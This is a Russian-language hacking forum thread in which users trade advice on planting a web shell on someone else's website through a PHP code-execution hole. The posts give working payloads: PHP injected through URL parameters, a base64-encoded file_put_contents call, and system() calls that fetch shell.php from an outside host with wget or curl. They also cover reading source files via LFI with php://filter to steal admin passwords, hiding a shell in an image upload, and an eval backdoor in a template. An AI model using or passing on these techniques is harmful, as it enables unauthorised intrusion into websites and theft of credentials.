Есть выполнение php скрипта на сайте, как залить шелл? http://www.site.com/index.php?s=10&id=phpinfo(); mq=on
так в этом и вся проблема, таблицы типа user_rights, user_permisson, admin_user и т.п. нет. а ты говорил что пасс может быть в файле, это как то можно проверить?? (всмисле через запрос к мускулу)
пасс в файле, такое встречается на околоафриканских сайтах, или в ретро web -е, если нету таблиц значит они в другой базе, если нету таблиц для админа значит авторизация через пароли которые хранятся внутри скрипта, включите фантазию
Надоело уже плодить темы с моими вопросами по залитию шелла, так что если я тут задам свой небольшой вопрос, надеюсь никто не будет возражать? Могу менять имя и расширение загружаемого файла через пост запрос, но, шелл в формате jpg не грузит, так как при загрузке меняются размеры изображения и выкидывается ошибка, если в картинку в конец прописать мини-шелл и загрузить (естественно переименовать расширение в пхп), то он не работает, и вижу я только код картинки. Кто что посоветует сделать?
базы тоже проверял, только две - information_schema и текущяя где про это можно поподробнее прочитать??
о чем прочитать? нечего там прочитать, если этот тот случий тогда вам нужен file_priv или другие средства (читалка чтоли) чтоб смотреть исходники файлов, стянуть пароль
или LFI с возможностю читать исходники с помощю php://filter, или читалка, file_get_contents, fopen, прочее
Пытаюсь создать файл со следующим содержимым file_put_contents('lala.php', '<? echo 50/2; ?>'); http://www.site.com/index.php?s=10&id=base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=); mq=on и поэтому адресу должен появиться файл http://www.site.com/lala.php но вместо этого: 404. Запрошенный Вами документ отсутствует на сервере.
ты функцию base64_decode передаешь стринг, почему не вижу кавычки? если mq on, тогда base64_decode($_GET[a]);&a=твой_base64_код
Делаю http://www.site.com/index.php?s=10&id=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs= и тут http://www.site.com/lala.php все равно выводит 404. Запрошенный Вами документ отсутствует на сервере.
если твой бекдор принимает пост запросы, папробуй отправить данные POST-ом, по всей видимости там фильтр, или используй другие функции
можешь использовать системные комманды (если safe мод off), system,exec,shell_exec,passthru, залей через wget или curl, или что там еще есть пример system($_GET[a]);&a=wget http://site.ru/shell.php или через принт, print(`curl http://site.ru/shell.php > ./shell.php`); неоднакратно обсуждалось это тема
у меня в шаблоне записан eval, его что нужно заменить sistem? <if="$this->ipsclass->input['cid'] = 1"> <if="eval($this->ipsclass->input['id'])"></if> </if>
не надо ничем заменить, вместо file_put_contents, используйте те функции которые я написал er9j6@ достаточно зафлудили в теме, листайте топик, уверен найдете все ответы на ваши вопросы
Существуют ли аналоги Goolag Scanner? И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.
